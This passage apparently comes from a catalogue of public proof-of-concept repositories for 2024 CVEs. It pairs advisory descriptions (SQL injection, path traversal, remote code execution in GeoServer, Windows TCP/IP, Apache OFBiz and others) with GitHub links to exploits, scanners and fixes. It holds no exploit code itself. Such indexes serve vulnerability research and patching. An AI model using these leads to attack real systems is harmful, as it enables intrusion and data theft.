IBM Security Verify Access 10.0.0 through 10.0.8 OIDC Provider could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim.
- [Ozozuz/Ozozuz-IBM-Security-Verify-CVE-2024-35133](https://github.com/Ozozuz/Ozozuz-IBM-Security-Verify-CVE-2024-35133)
### CVE-2024-35205 (-)
The WPS Office (aka cn.wps.moffice_eng) application before 17.0.0 for Android fails to properly sanitize file names before processing them through external application interactions, leading to a form of path traversal. This potentially enables any application to dispatch a crafted library file, aiming to overwrite an existing native library utilized by WPS Office. Successful exploitation could result in the execution of arbitrary commands under the guise of WPS Office's application ID.
- [cyb3r-w0lf/Dirty_Stream-Android-POC](https://github.com/cyb3r-w0lf/Dirty_Stream-Android-POC)
### CVE-2024-35242 (2024-06-10)
Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch names can lead to command injection. This requires cloning untrusted repositories. Patches are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid cloning potentially compromised repositories.\n
- [KKkai0315/CVE-2024-35242](https://github.com/KKkai0315/CVE-2024-35242)
### CVE-2024-35250 (2024-06-11)
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
- [varwara/CVE-2024-35250](https://github.com/varwara/CVE-2024-35250)
- [0xjiefeng/CVE-2024-35250-BOF](https://github.com/0xjiefeng/CVE-2024-35250-BOF)
### CVE-2024-35315
- [ewilded/CVE-2024-35315-POC](https://github.com/ewilded/CVE-2024-35315-POC)
### CVE-2024-35333 (-)
A stack-buffer-overflow vulnerability exists in the read_charset_decl function of html2xhtml 1.3. This vulnerability occurs due to improper bounds checking when copying data into a fixed-size stack buffer. An attacker can exploit this vulnerability by providing a specially crafted input to the vulnerable function, causing a buffer overflow and potentially leading to arbitrary code execution, denial of service, or data corruption.
- [momo1239/CVE-2024-35333](https://github.com/momo1239/CVE-2024-35333)
### CVE-2024-35468 (-)
A SQL injection vulnerability in /hrm/index.php in SourceCodester Human Resource Management System 1.0 allows attackers to execute arbitrary SQL commands via the password parameter.
- [dovankha/CVE-2024-35468](https://github.com/dovankha/CVE-2024-35468)
### CVE-2024-35469 (-)
A SQL injection vulnerability in /hrm/user/ in SourceCodester Human Resource Management System 1.0 allows attackers to execute arbitrary SQL commands via the password parameter.
- [dovankha/CVE-2024-35469](https://github.com/dovankha/CVE-2024-35469)
### CVE-2024-35475 (-)
A Cross-Site Request Forgery (CSRF) vulnerability was discovered in OpenKM Community Edition on or before version 6.3.12. The vulnerability exists in /admin/DatabaseQuery, which allows an attacker to manipulate a victim with administrative privileges to execute arbitrary SQL commands.
- [carsonchan12345/CVE-2024-35475](https://github.com/carsonchan12345/CVE-2024-35475)
### CVE-2024-35511 (-)
phpgurukul Men Salon Management System v2.0 is vulnerable to SQL Injection via the "username" parameter of /msms/admin/index.php.
- [efekaanakkar/CVE-2024-35511](https://github.com/efekaanakkar/CVE-2024-35511)
### CVE-2024-35538 (2024-08-19)
Typecho v1.3.0 was discovered to contain a Client IP Spoofing vulnerability, which allows attackers to falsify their IP addresses by specifying an arbitrary IP as value of X-Forwarded-For or Client-Ip headers while performing HTTP requests.
- [cyberaz0r/Typecho-Multiple-Vulnerabilities](https://github.com/cyberaz0r/Typecho-Multiple-Vulnerabilities)
### CVE-2024-35584
- [whwhwh96/CVE-2024-35584](https://github.com/whwhwh96/CVE-2024-35584)
### CVE-2024-36079 (-)
An issue was discovered in Vaultize 21.07.27. When uploading files, there is no check that the filename parameter is correct. As a result, a temporary file will be created outside the specified directory when the file is downloaded. To exploit this, an authenticated user would upload a file with an incorrect file name, and then download it.
- [DxRvs/vaultize_CVE-2024-36079](https://github.com/DxRvs/vaultize_CVE-2024-36079)
### CVE-2024-36104 (2024-06-04)
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.14.\n\nUsers are recommended to upgrade to version 18.12.14, which fixes the issue.\n\n
- [ggfzx/CVE-2024-36104](https://github.com/ggfzx/CVE-2024-36104)
### CVE-2024-36401 (2024-07-01)
GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n\nThe GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code.\n\nVersions 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.
- [bigb0x/CVE-2024-36401](https://github.com/bigb0x/CVE-2024-36401)
- [Niuwoo/CVE-2024-36401](https://github.com/Niuwoo/CVE-2024-36401)
- [RevoltSecurities/CVE-2024-36401](https://github.com/RevoltSecurities/CVE-2024-36401)
- [Mr-xn/CVE-2024-36401](https://github.com/Mr-xn/CVE-2024-36401)
- [zgimszhd61/CVE-2024-36401](https://github.com/zgimszhd61/CVE-2024-36401)
- [jakabakos/CVE-2024-36401-GeoServer-RCE](https://github.com/jakabakos/CVE-2024-36401-GeoServer-RCE)
- [ahisec/geoserver-](https://github.com/ahisec/geoserver-)
- [Chocapikk/CVE-2024-36401](https://github.com/Chocapikk/CVE-2024-36401)
- [yisas93/CVE-2024-36401-PoC](https://github.com/yisas93/CVE-2024-36401-PoC)
- [justin-p/geoexplorer](https://github.com/justin-p/geoexplorer)
- [daniellowrie/CVE-2024-36401-PoC](https://github.com/daniellowrie/CVE-2024-36401-PoC)
- [PunitTailor55/GeoServer-CVE-2024-36401](https://github.com/PunitTailor55/GeoServer-CVE-2024-36401)
- [netuseradministrator/CVE-2024-36401](https://github.com/netuseradministrator/CVE-2024-36401)
- [kkhackz0013/CVE-2024-36401](https://github.com/kkhackz0013/CVE-2024-36401)
### CVE-2024-36416 (2024-06-10)
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a deprecated v4 API example with no log rotation allows denial of service by logging excessive data. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
- [kva55/CVE-2024-36416](https://github.com/kva55/CVE-2024-36416)
### CVE-2024-36424 (2024-08-06)
K7RKScan.sys in K7 Ultimate Security before 17.0.2019 allows local users to cause a denial of service (BSOD) because of a NULL pointer dereference.
- [secunnix/CVE-2024-36424](https://github.com/secunnix/CVE-2024-36424)
### CVE-2024-36527 (2024-06-17)
puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
- [bigb0x/CVE-2024-36527](https://github.com/bigb0x/CVE-2024-36527)
### CVE-2024-36539 (2024-07-24)
Insecure permissions in contour v1.28.3 allows attackers to access sensitive data and escalate privileges by obtaining the service account's token.
- [Abdurahmon3236/CVE-2024-36539](https://github.com/Abdurahmon3236/CVE-2024-36539)
### CVE-2024-36821 (2024-06-11)
Insecure permissions in Linksys Velop WiFi 5 (WHW01v1) 1.1.13.202617 allows attackers to escalate privileges from Guest to root.
- [IvanGlinkin/CVE-2024-36821](https://github.com/IvanGlinkin/CVE-2024-36821)
### CVE-2024-36837 (2024-06-05)
SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.
- [phtcloud-dev/CVE-2024-36837](https://github.com/phtcloud-dev/CVE-2024-36837)
- [lhc321-source/CVE-2024-36837](https://github.com/lhc321-source/CVE-2024-36837)
### CVE-2024-36842
- [abbiy/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-](https://github.com/abbiy/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-)
### CVE-2024-36877 (2024-08-12)
Micro-Star International Z-series motherboards (Z590, Z490, and Z790) and B-series motherboards (B760, B560, B660, and B460) with firmware 7D25v14, 7D25v17 to 7D25v19, and 7D25v1A to 7D25v1H was discovered to contain a write-what-where condition in the in the SW handler for SMI 0xE3. Motherboard's with the following chipsets are affected: Intel 300, Intel 400, Intel 500, Intel 600, Intel 700, AMD 300, AMD 400, AMD 500, AMD 600 and AMD 700.
- [jjensn/CVE-2024-36877](https://github.com/jjensn/CVE-2024-36877)
- [CERTologists/POC-CVE-2024-36877](https://github.com/CERTologists/POC-CVE-2024-36877)
### CVE-2024-36991 (2024-07-01)
In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.
- [bigb0x/CVE-2024-36991](https://github.com/bigb0x/CVE-2024-36991)
- [Mr-xn/CVE-2024-36991](https://github.com/Mr-xn/CVE-2024-36991)
- [th3gokul/CVE-2024-36991](https://github.com/th3gokul/CVE-2024-36991)
- [sardine-web/CVE-2024-36991](https://github.com/sardine-web/CVE-2024-36991)
- [Cappricio-Securities/CVE-2024-36991](https://github.com/Cappricio-Securities/CVE-2024-36991)
### CVE-2024-37032 (2024-05-31)
Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring.
- [Bi0x/CVE-2024-37032](https://github.com/Bi0x/CVE-2024-37032)
- [ahboon/CVE-2024-37032-scanner](https://github.com/ahboon/CVE-2024-37032-scanner)
### CVE-2024-37051 (2024-06-10)
GitHub access token could be exposed to third-party sites in JetBrains IDEs after version 2023.1 and less than: IntelliJ IDEA 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; Aqua 2024.1.2; CLion 2023.1.7, 2023.2.4, 2023.3.5, 2024.1.3, 2024.2 EAP2; DataGrip 2023.1.3, 2023.2.4, 2023.3.5, 2024.1.4; DataSpell 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.2, 2024.2 EAP1; GoLand 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; MPS 2023.2.1, 2023.3.1, 2024.1 EAP2; PhpStorm 2023.1.6, 2023.2.6, 2023.3.7, 2024.1.3, 2024.2 EAP3; PyCharm 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.3, 2024.2 EAP2; Rider 2023.1.7, 2023.2.5, 2023.3.6, 2024.1.3; RubyMine 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP4; RustRover 2024.1.1; WebStorm 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.4
- [LeadroyaL/CVE-2024-37051-EXP](https://github.com/LeadroyaL/CVE-2024-37051-EXP)
- [mrblackstar26/CVE-2024-37051](https://github.com/mrblackstar26/CVE-2024-37051)
### CVE-2024-37081 (2024-06-18)
The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance.
- [mbadanoiu/CVE-2024-37081](https://github.com/mbadanoiu/CVE-2024-37081)
- [Mr-r00t11/CVE-2024-37081](https://github.com/Mr-r00t11/CVE-2024-37081)
- [CERTologists/-CVE-2024-37081-POC](https://github.com/CERTologists/-CVE-2024-37081-POC)
- [CERTologists/Modified-CVE-2024-37081-POC](https://github.com/CERTologists/Modified-CVE-2024-37081-POC)
### CVE-2024-37084 (2024-07-25)
In Spring Cloud Data Flow versions prior to 2.11.4, a malicious user who has access to the Skipper server api can use a crafted upload request to write an arbitrary file to any location on the file system which could lead to compromising the server
- [Kayiyan/CVE-2024-37084-Poc](https://github.com/Kayiyan/CVE-2024-37084-Poc)
- [vuhz/CVE-2024-37084](https://github.com/vuhz/CVE-2024-37084)
- [Ly4j/CVE-2024-37084-Exp](https://github.com/Ly4j/CVE-2024-37084-Exp)
- [A0be/CVE-2024-37084-Exp](https://github.com/A0be/CVE-2024-37084-Exp)
### CVE-2024-37085 (2024-06-25)
VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD.
- [mahmutaymahmutay/CVE-2024-37085](https://github.com/mahmutaymahmutay/CVE-2024-37085)
- [Florian-Hoth/CVE-2024-37085-RCE-POC](https://github.com/Florian-Hoth/CVE-2024-37085-RCE-POC)
- [WTN-arny/Vmware-ESXI](https://github.com/WTN-arny/Vmware-ESXI)
- [WTN-arny/CVE-2024-37085](https://github.com/WTN-arny/CVE-2024-37085)
### CVE-2024-37147 (2024-07-10)
GLPI is an open-source asset and IT management software package that provides ITIL Service Desk features, licenses tracking and software auditing. An authenticated user can attach a document to any item, even if the user has no write access on it. Upgrade to 10.0.16.
- [0xmupa/CVE-2024-37147-PoC](https://github.com/0xmupa/CVE-2024-37147-PoC)
### CVE-2024-37383 (2024-06-07)
Roundcube Webmail before 1.5.7 and 1.6.x before 1.6.7 allows XSS via SVG animate attributes.
- [bartfroklage/CVE-2024-37383-POC](https://github.com/bartfroklage/CVE-2024-37383-POC)
### CVE-2024-37393 (2024-06-10)
Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.
- [optistream/securenvoy-cve-2024-37393](https://github.com/optistream/securenvoy-cve-2024-37393)
### CVE-2024-37713
- [fullbbadda1208/CVE-2024-37713](https://github.com/fullbbadda1208/CVE-2024-37713)
### CVE-2024-37726 (2024-07-03)
Insecure Permissions vulnerability in Micro-Star International Co., Ltd MSI Center v.2.0.36.0 allows a local attacker to escalate privileges via the Export System Info function in MSI.CentralServer.exe
- [carsonchan12345/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation](https://github.com/carsonchan12345/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation)
- [NextGenPentesters/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation](https://github.com/NextGenPentesters/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation)
### CVE-2024-37742 (2024-06-25)
Insecure Access Control in Safe Exam Browser (SEB) = 3.5.0 on Windows. The vulnerability allows an attacker to share clipboard data between the SEB kiosk mode and the underlying system, compromising exam integrity. By exploiting this flaw, an attacker can bypass exam controls and gain an unfair advantage during exams.
- [Eteblue/CVE-2024-37742](https://github.com/Eteblue/CVE-2024-37742)
### CVE-2024-37759 (2024-06-24)
DataGear v5.0.0 and earlier was discovered to contain a SpEL (Spring Expression Language) expression injection vulnerability via the Data Viewing interface.
- [crumbledwall/CVE-2024-37759_PoC](https://github.com/crumbledwall/CVE-2024-37759_PoC)
### CVE-2024-37762 (2024-07-01)
MachForm up to version 21 is affected by an authenticated unrestricted file upload which leads to a remote code execution.
- [Atreb92/cve-2024-37762](https://github.com/Atreb92/cve-2024-37762)
### CVE-2024-37763 (2024-07-01)
MachForm up to version 19 is affected by an unauthenticated stored cross-site scripting which affects users with valid sessions whom can view compiled forms results.
- [Atreb92/cve-2024-37763](https://github.com/Atreb92/cve-2024-37763)
### CVE-2024-37764 (2024-07-01)
MachForm up to version 19 is affected by an authenticated stored cross-site scripting.
- [Atreb92/cve-2024-37764](https://github.com/Atreb92/cve-2024-37764)
### CVE-2024-37765 (2024-07-01)
Machform up to version 19 is affected by an authenticated Blind SQL injection in the user account settings page.
- [Atreb92/cve-2024-37765](https://github.com/Atreb92/cve-2024-37765)
### CVE-2024-37770 (2024-07-10)
14Finger v1.1 was discovered to contain a remote command execution (RCE) vulnerability in the fingerprint function. This vulnerability allows attackers to execute arbitrary commands via a crafted payload.
- [k3ppf0r/CVE-2024-37770](https://github.com/k3ppf0r/CVE-2024-37770)
### CVE-2024-37791 (2024-06-18)
DuxCMS3 v3.1.3 was discovered to contain a SQL injection vulnerability via the keyword parameter at /article/Content/index?class_id.
- [czheisenberg/CVE-2024-37791](https://github.com/czheisenberg/CVE-2024-37791)
### CVE-2024-37843 (2024-06-25)
Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.
- [gsmith257-cyber/CVE-2024-37843-POC](https://github.com/gsmith257-cyber/CVE-2024-37843-POC)
### CVE-2024-37888 (2024-06-14)
The Open Link is a CKEditor plugin, extending context menu with a possibility to open link in a new tab. The vulnerability allowed to execute JavaScript code by abusing link href attribute. It affects all users using the Open Link plugin at version < **1.0.5**.
- [7Ragnarok7/CVE-2024-37888](https://github.com/7Ragnarok7/CVE-2024-37888)
### CVE-2024-37889 (2024-06-14)
MyFinances is a web application for managing finances. MyFinances has a way to access other customer invoices while signed in as a user. This method allows an actor to access PII and financial information from another account. The vulnerability is fixed in 0.4.6.
- [uname-s/CVE-2024-37889](https://github.com/uname-s/CVE-2024-37889)
### CVE-2024-38036
- [hnytgl/CVE-2024-38036](https://github.com/hnytgl/CVE-2024-38036)
### CVE-2024-38041 (2024-07-09)
Windows Kernel Information Disclosure Vulnerability
- [varwara/CVE-2024-38041](https://github.com/varwara/CVE-2024-38041)
### CVE-2024-38063 (2024-08-13)
Windows TCP/IP Remote Code Execution Vulnerability
- [diegoalbuquerque/CVE-2024-38063](https://github.com/diegoalbuquerque/CVE-2024-38063)
- [noradlb1/CVE-2024-38063-VB](https://github.com/noradlb1/CVE-2024-38063-VB)
- [Sachinart/CVE-2024-38063-poc](https://github.com/Sachinart/CVE-2024-38063-poc)
- [p33d/cve-2024-38063](https://github.com/p33d/cve-2024-38063)
- [dweger-scripts/CVE-2024-38063-Remediation](https://github.com/dweger-scripts/CVE-2024-38063-Remediation)
- [almogopp/Disable-IPv6-CVE-2024-38063-Fix](https://github.com/almogopp/Disable-IPv6-CVE-2024-38063-Fix)
- [Th3Tr1ckst3r/CVE-2024-38063](https://github.com/Th3Tr1ckst3r/CVE-2024-38063)
- [haroonawanofficial/CVE-2024-38063-Research-Tool](https://github.com/haroonawanofficial/CVE-2024-38063-Research-Tool)
- [ynwarcs/CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063)
- [patchpoint/CVE-2024-38063](https://github.com/patchpoint/CVE-2024-38063)
- [PumpkinBridge/Windows-CVE-2024-38063](https://github.com/PumpkinBridge/Windows-CVE-2024-38063)
- [zenzue/CVE-2024-38063-POC](https://github.com/zenzue/CVE-2024-38063-POC)
- [AdminPentester/CVE-2024-38063-](https://github.com/AdminPentester/CVE-2024-38063-)
- [ThemeHackers/CVE-2024-38063](https://github.com/ThemeHackers/CVE-2024-38063)
- [KernelKraze/CVE-2024-38063_PoC](https://github.com/KernelKraze/CVE-2024-38063_PoC)
- [ps-interactive/cve-2024-38063](https://github.com/ps-interactive/cve-2024-38063)
- [Brownpanda29/Cve-2024-38063](https://github.com/Brownpanda29/Cve-2024-38063)
- [FrancescoDiSalesGithub/quick-fix-cve-2024-38063](https://github.com/FrancescoDiSalesGithub/quick-fix-cve-2024-38063)
- [Faizan-Khanx/CVE-2024-38063](https://github.com/Faizan-Khanx/CVE-2024-38063)
- [ArenaldyP/CVE-2024-38063-Medium](https://github.com/ArenaldyP/CVE-2024-38063-Medium)
- [lnx-dvlpr/cve-2024-38063](https://github.com/lnx-dvlpr/cve-2024-38063)
- [becrevex/CVE-2024-38063](https://github.com/becrevex/CVE-2024-38063)
- [idkwastaken/CVE-2024-38063](https://github.com/idkwastaken/CVE-2024-38063)
- [thanawee321/CVE-2024-38063](https://github.com/thanawee321/CVE-2024-38063)
### CVE-2024-38077 (2024-07-09)
Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
- [SecStarBot/CVE-2024-38077-POC](https://github.com/SecStarBot/CVE-2024-38077-POC)
- [qi4L/CVE-2024-38077](https://github.com/qi4L/CVE-2024-38077)
- [Sec-Link/CVE-2024-38077](https://github.com/Sec-Link/CVE-2024-38077)
- [murphysecurity/RDL-detect](https://github.com/murphysecurity/RDL-detect)
- [Wlibang/CVE-2024-38077](https://github.com/Wlibang/CVE-2024-38077)
- [psl-b/CVE-2024-38077-check](https://github.com/psl-b/CVE-2024-38077-check)
- [zhuxi1965/CVE-2024-38077-RDLCheck](https://github.com/zhuxi1965/CVE-2024-38077-RDLCheck)
- [lworld0x00/CVE-2024-38077-notes](https://github.com/lworld0x00/CVE-2024-38077-notes)
- [atlassion/CVE-2024-38077-check](https://github.com/atlassion/CVE-2024-38077-check)
- [BBD-YZZ/fyne-gui](https://github.com/BBD-YZZ/fyne-gui)
- [Destiny0991/check_38077](https://github.com/Destiny0991/check_38077)
- [mrmtwoj/CVE-2024-38077](https://github.com/mrmtwoj/CVE-2024-38077)
### CVE-2024-38080 (2024-07-09)
Windows Hyper-V Elevation of Privilege Vulnerability
- [pwndorei/CVE-2024-38080](https://github.com/pwndorei/CVE-2024-38080)
### CVE-2024-38100 (2024-07-09)
Windows File Explorer Elevation of Privilege Vulnerability
- [Florian-Hoth/CVE-2024-38100-RCE-POC](https://github.com/Florian-Hoth/CVE-2024-38100-RCE-POC)
### CVE-2024-38124
- [tadash10/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468](https://github.com/tadash10/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468)
### CVE-2024-38127 (2024-08-13)
Windows Hyper-V Elevation of Privilege Vulnerability
- [pwndorei/CVE-2024-38127](https://github.com/pwndorei/CVE-2024-38127)
### CVE-2024-38144 (2024-08-13)
Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
- [Dor00tkit/CVE-2024-38144](https://github.com/Dor00tkit/CVE-2024-38144)
### CVE-2024-38178 (2024-08-13)
Scripting Engine Memory Corruption Vulnerability
- [uixss/PoC-CVE-2024-38178](https://github.com/uixss/PoC-CVE-2024-38178)
### CVE-2024-38189 (2024-08-13)
Microsoft Project Remote Code Execution Vulnerability
- [vx7z/CVE-2024-38189](https://github.com/vx7z/CVE-2024-38189)
### CVE-2024-38200 (2024-08-08)
Microsoft Office Spoofing Vulnerability
- [passtheticket/CVE-2024-38200](https://github.com/passtheticket/CVE-2024-38200)
### CVE-2024-38366 (2024-07-01)
trunk.cocoapods.org is the authentication server for the CoacoaPods dependency manager. The part of trunk which verifies whether a user has a real email address on signup used a rfc-822 library which executes a shell command to validate the email domain MX records validity. It works via an DNS MX. This lookup could be manipulated to also execute a command on the trunk server, effectively giving root access to the server and the infrastructure. This issue was patched server-side with commit 001cc3a430e75a16307f5fd6cdff1363ad2f40f3 in September 2023. This RCE triggered a full user-session reset, as an attacker could have used this method to write to any Podspec in trunk.
- [ReeFSpeK/CocoaPods-RCE_CVE-2024-38366](https://github.com/ReeFSpeK/CocoaPods-RCE_CVE-2024-38366)
### CVE-2024-38396 (2024-06-16)
An issue was discovered in iTerm2 3.5.x before 3.5.2. Unfiltered use of an escape sequence to report a window title, in combination with the built-in tmux integration feature (enabled by default), allows an attacker to inject arbitrary code into the terminal, a different vulnerability than CVE-2024-38395.
- [vin01/poc-cve-2024-38396](https://github.com/vin01/poc-cve-2024-38396)
### CVE-2024-38472 (2024-07-01)
SSRF in Apache HTTP Server on Windows allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests or content \nUsers are recommended to upgrade to version 2.4.60 which fixes this issue. Note: Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing.
- [Abdurahmon3236/CVE-2024-38472](https://github.com/Abdurahmon3236/CVE-2024-38472)
- [mrmtwoj/apache-vulnerability-testing](https://github.com/mrmtwoj/apache-vulnerability-testing)
### CVE-2024-38473 (2024-07-01)
Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.\nUsers are recommended to upgrade to version 2.4.60, which fixes this issue.
- [Abdurahmon3236/CVE-2024-38473](https://github.com/Abdurahmon3236/CVE-2024-38473)
- [juanschallibaum/CVE-2024-38473-Nuclei-Template](https://github.com/juanschallibaum/CVE-2024-38473-Nuclei-Template)
### CVE-2024-38475 (2024-07-01)
Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. \n\nSubstitutions in server context that use a backreferences or variables as the first segment of the substitution are affected. Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.
- [p0in7s/CVE-2024-38475](https://github.com/p0in7s/CVE-2024-38475)
### CVE-2024-38526 (2024-06-25)
pdoc provides API Documentation for Python Projects. Documentation generated with `pdoc --math` linked to JavaScript files from polyfill.io. The polyfill.io CDN has been sold and now serves malicious code. This issue has been fixed in pdoc 14.5.1.
- [putget/pollypull](https://github.com/putget/pollypull)
### CVE-2024-38537 (2024-07-02)
Fides is an open-source privacy engineering platform. `fides.js`, a client-side script used to interact with the consent management features of Fides, used the `polyfill.io` domain in a very limited edge case, when it detected a legacy browser such as IE11 that did not support the fetch standard. Therefore it was possible for users of legacy, pre-2017 browsers who navigate to a page serving `fides.js` to download and execute malicious scripts from the `polyfill.io` domain when the domain was compromised and serving malware. No exploitation of `fides.js` via `polyfill.io` has been identified as of time of publication.\n\nThe vulnerability has been patched in Fides version `2.39.1`. Users are advised to upgrade to this version or later to secure their systems against this threat. On Thursday, June 27, 2024, Cloudflare and Namecheap intervened at a domain level to ensure `polyfill.io` and its subdomains could not resolve to the compromised service, rendering this vulnerability unexploitable. Prior to the domain level intervention, there were no server-side workarounds and the confidentiality, integrity, and availability impacts of this vulnerability were high. Clients could ensure they were not affected by using a modern browser that supported the fetch standard.
- [Havoc10-sw/Detect_polyfill_CVE-2024-38537-](https://github.com/Havoc10-sw/Detect_polyfill_CVE-2024-38537-)
### CVE-2024-38793 (2024-08-29)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PriceListo Best Restaurant Menu by PriceListo allows SQL Injection.This issue affects Best Restaurant Menu by PriceListo: from n/a through 1.4.1.
- [ret2desync/CVE-2024-38793-PoC](https://github.com/ret2desync/CVE-2024-38793-PoC)
### CVE-2024-38812
- [groshi/CVE-2024-38812-POC-5-Hands-Private](https://github.com/groshi/CVE-2024-38812-POC-5-Hands-Private)
### CVE-2024-38816 (2024-09-13)
Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running.\n\nSpecifically, an application is vulnerable when both of the following are true:\n\n * the web application uses RouterFunctions to serve static resources\n * resource handling is explicitly configured with a FileSystemResource location\n\n\nHowever, malicious requests are blocked and rejected when any of the following is true:\n\n * the Spring Security HTTP Firewall https://docs.spring.io/spring-security/reference/servlet/exploits/firewall.html is in use\n * the application runs on Tomcat or Jetty
- [startsw1th/cve-2024-38816-demo](https://github.com/startsw1th/cve-2024-38816-demo)
- [WULINPIN/CVE-2024-38816-PoC](https://github.com/WULINPIN/CVE-2024-38816-PoC)
- [Galaxy-system/cve-2024-38816](https://github.com/Galaxy-system/cve-2024-38816)
### CVE-2024-38821
- [mouadk/cve-2024-38821](https://github.com/mouadk/cve-2024-38821)
### CVE-2024-38856 (2024-08-05)
Incorrect Authorization vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: through 18.12.14.\n\nUsers are recommended to upgrade to version 18.12.15, which fixes the issue.\n\nUnauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).
- [securelayer7/CVE-2024-38856_Scanner](https://github.com/securelayer7/CVE-2024-38856_Scanner)
- [ThatNotEasy/CVE-2024-38856](https://github.com/ThatNotEasy/CVE-2024-38856)
- [Praison001/CVE-2024-38856-ApacheOfBiz](https://github.com/Praison001/CVE-2024-38856-ApacheOfBiz)
- [0x20c/CVE-2024-38856-EXP](https://github.com/0x20c/CVE-2024-38856-EXP)
- [emanueldosreis/CVE-2024-38856](https://github.com/emanueldosreis/CVE-2024-38856)
- [BBD-YZZ/CVE-2024-38856-RCE](https://github.com/BBD-YZZ/CVE-2024-38856-RCE)
### CVE-2024-39031 (2024-07-09)
In Silverpeas Core <= 6.3.5, in Mes Agendas, a user can create new events and add them to their calendar. Additionally, users can invite others from the same domain, including administrators, to these events. A standard user can inject an XSS payload into the "Titre" and "Description" fields when creating an event and then add the administrator or any user to the event. When the invited user (victim) views their own profile, the payload will be executed on their side, even if they do not click on the event.
- [toneemarqus/CVE-2024-39031](https://github.com/toneemarqus/CVE-2024-39031)
### CVE-2024-39069 (2024-07-09)
An issue in ifood Order Manager v3.35.5 'Gestor de Peddios.exe' allows attackers to execute arbitrary code via a DLL hijacking attack.
